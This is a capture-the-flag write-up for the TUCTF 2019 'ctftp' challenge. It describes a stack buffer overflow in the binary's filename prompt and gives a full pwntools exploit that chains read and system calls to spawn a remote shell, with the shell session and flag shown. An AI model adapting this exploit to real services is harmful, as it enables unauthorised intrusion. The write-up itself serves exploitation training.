ctftp [pwn]
TUCTF 2019

ctftp

Just what the world needs... another vulnerable FTP server. Have fun.

nc chal.tuctf.com 30500

Recon

ctftp is a linux binary which asks for a username to login and then gives you the option to list or get files.

$ file ctftp 
ctftp: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-, BuildID[sha1]=fee7d187626ef9b20f3eb50b1047438c6df6c9d3, for GNU/Linux 3.2.0, not stripped
$ checksec cftp
[*] 'cftp'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
$ ./cftp 
Welcome to the CTFTP: the netcat-based FTP server
Enter your name: asby
Welcome asby, feel free to browse my wares

Choose a command:
1) List Files
2) Get Files
> 1
ctftp
firefox.png
flags
gitlab.png
lorem.txt
rockyou.zip
stack_smashing.pdf
usernames.txt
...
> 2
> 2
Enter filename: /etc/passwd
File not found: 'etcpasswd'

It filters out several characters, like /, so it is not possible to open the flags directory. It also filters out the file ctftp, but with c/t/f/t/p as input we could download the binary. Not that it helped much, since it was also provided with the challenge.

The binary got a buffer overflow when asking for a filename.

void get()
{
  char s; // [sp+0h] [bp-48h]@1
  int v1; // [sp+40h] [bp-8h]@1

  printf("Enter filename: ");
  memset(&s, 0, 0x40u);
  v1 = read(0, &s, 0x80u);
  if ( !restrictedFiles(&s) )
  {
    filter(&s, v1);
    if ( !checkFile(&s) )
    {
      printf("Sending File: %s\n", &s);
      sendFile(&s);
    }
  }
}

We could use this to overwrite EIP. Since the binary is loaded with useful functions we can just do a read followed by a system to get a shell.

Code

#!/usr/bin/env python

from pwn import *

s = process("./cftp")
s = remote("chal.tuctf.com", 30500)

adata = 0x0804c054

asys =  0x80490b0
aread = 0x8049030
cmd = "/bin/sh"
dummy = "BBBB"

popret3 = 0x080497e1

print s.recvuntil("name: ")
s.send("asby\n")
print s.recvuntil("> ")
s.send("2\n")

buf  = "A"*76 

buf += p32(aread)
buf += p32(popret3)
buf += p32(0)
buf += p32(adata)
buf += p32(len(cmd))

buf += p32(asys)
buf += dummy
buf += p32(adata)
s.send(buf)
s.send(cmd)
s.interactive()

Flag

$ ./ftp.py 
[+] Starting local process './cftp': pid 28089
[+] Opening connection to chal.tuctf.com on port 30500: Done
Welcome to the CTFTP: the netcat-based FTP server
Enter your name: 
Welcome /bin/sh, feel free to browse my wares

Choose a command:
1) List Files
2) Get Files
> 
[*] Switching to interactive mode
Enter filename: File not found: 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAt'
$ sh -i
$ 
$ ls -la
total 52808
dr-xr-xr-x 1 root root     4096 Nov 29 08:28 .
drwxr-xr-x 1 root root     4096 Nov 21 23:14 ..
-r-xr-xr-x 1 root root    16188 Nov 29 08:25 ctftp
-r--r--r-- 1 root root   260421 Nov 29 08:24 firefox.png
dr-xr-xr-x 1 root root     4096 Nov 22 00:14 flags
-r--r--r-- 1 root root     4604 Nov 29 08:24 gitlab.png
-r--r--r-- 1 root root      446 Nov 29 08:24 lorem.txt
-r--r--r-- 1 root root 53357204 Nov 29 08:24 rockyou.zip
-r--r--r-- 1 root root   408599 Nov 29 08:24 stack_smashing.pdf
-r--r--r-- 1 root root      707 Nov 29 08:24 usernames.txt
$ ls -la flags
total 12
dr-xr-xr-x 1 root root 4096 Nov 22 00:14 .
dr-xr-xr-x 1 root root 4096 Nov 29 08:28 ..
-r--r--r-- 1 root root   58 Nov 29 08:25 flag.txt
$ cat flags/flag.txt
TUCTF{f1l73r_f1r57_7h3y_541d._y0u'll_b3_53cur3_7h3y_541d}

Running the exploit gives us the flag TUCTF{f1l73r_f1r57_7h3y_541d._y0u'll_b3_53cur3_7h3y_541d}